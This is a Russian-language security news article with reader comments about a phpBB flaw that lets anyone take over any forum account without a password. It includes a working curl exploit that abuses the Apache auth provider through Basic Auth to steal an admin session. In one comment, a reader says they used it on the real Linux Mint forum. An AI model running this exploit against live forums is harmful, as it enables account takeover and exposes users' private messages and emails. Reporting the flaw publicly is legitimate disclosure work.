Уязвимость в phpBB, позволяющая получить доступ к любому аккаунту без аутентификации

11.06.2026 22:43 (MSK)

В свободном движке для создания форумов phpBB выявлена уязвимость, позволяющая через отправку одного HTTP-запроса подключиться к сеансу любого пользователя форума. Уязвимость проявляется в конфигурации phpBB по умолчанию. Проблема устранена в версии phpBB 3.3.17.

При атаке на обычных пользователей можно получить доступ к приватной переписке и возможности отправлять сообщения от имени пользователя. При атаке на модераторов и администраторов можно удалять чужие сообщения, просматривать IP-адреса и email, читать приватную переписку, но нельзя зайти в интерфейс администратора и получить доступ к хосту.

Детали об уязвимости не приводятся, но при помощи AI на основе исправления уже воссоздан метод эксплуатации, основанный на обращении к обработчику "login_link" с выставлением метода аутентификации "auth_provider=apache" и подстановкой логина через Basic Auth, после чего PHP выставит переменную окружения "PHP_AUTH_USER=логин", а phpBB извлечёт из неё логин пользователя без проверки пароля. Например, для получения идентификатора сессии пользователя admin и сохранения его в файл cookies.txt можно выполнить код:


   curl -i -s \
     -c cookies.txt \
     -b cookies.txt \
     -u 'admin:anything' \
     -d 'login=Login&login_username=admin&login_password=anything' \
     'https://target.example/forum/ucp.php?mode=login_link&auth_provider=apache&login_link_any=1'

исправить +8 +/–

Лицензия: CC BY 3.0

Наводку на новость прислал Аноним

Короткая ссылка: https://opennet.ru/65667-phpbb

Ключевые слова: phpbb

При перепечатке указание ссылки на opennet.ru обязательно

Обсуждение (8)

1.1, Аноним (1), 22:55, 11/06/2026 [ответить] [﹢﹢﹢] [ · · · ]	+3 +/–
Ух что сейчас будет с форумами.. Блин, надеюсь архивы есть. Пингуйте всех админов срочно, столько ценных данных потерять можем. Я проверил, реально работает, и это реально пи****. Можно залогиниться под админом. В админку зайти НЕЛЬЗЯ (т.к. phpBB спрашивает пароль ещё раз), но в модераторскую панель можно, и там можно много чего. Логи модерации, IPшки. Можно смотреть адреса почты всех юзеров. Можно логиниться всеми юзерами и скрапить ЛС.

2.7, Аноним (7), 23:23, 11/06/2026 [^] [^^] [^^^] [ответить]	+/–
> в модераторскую панель можно, и там можно много чего. Логи модерации, IPшки. Можно смотреть адреса почты всех юзеров. Можно логиниться всеми юзерами и скрапить ЛС. Ой, я вас умоляю. В том и плюс классических форумов, что кроме адреса почты там ничего ценного не наскрапишь, ибо не реального имени, ни номера телефона и т.п. они не требуют.

1.2, Аноним (2), 22:57, 11/06/2026 [ответить] [﹢﹢﹢] [ · · · ]	+2 +/–
Лол, а норм что на Linux Mint форуме это работает?)) https://forums.linuxmint.com/viewtopic.php?p=1430678#p1430678 послание внизу оставил

1.4, Аноним (4), 23:12, 11/06/2026 Скрыто ботом-модератором [﹢﹢﹢] [ · · · ] [к модератору]	+/–

2.8, q (ok), 23:38, 11/06/2026 Скрыто ботом-модератором [к модератору]	–1 +/–

1.9, Аноним (9), 00:51, 12/06/2026 Скрыто ботом-модератором [﹢﹢﹢] [ · · · ] [к модератору]	+/–

1.10, Аноним (10), 01:08, 12/06/2026 [ответить] [﹢﹢﹢] [ · · · ]	+/–
Ух, как будто бы во времени назад вернулся.

1.11, Аноним (11), 02:01, 12/06/2026 [ответить] [﹢﹢﹢] [ · · · ]	+/–
Отлично, всем недофорумам на этой поделке что ещё живы самое время умереть.

игнорирование участников | лог модерирования

Добавить комментарий

Текст: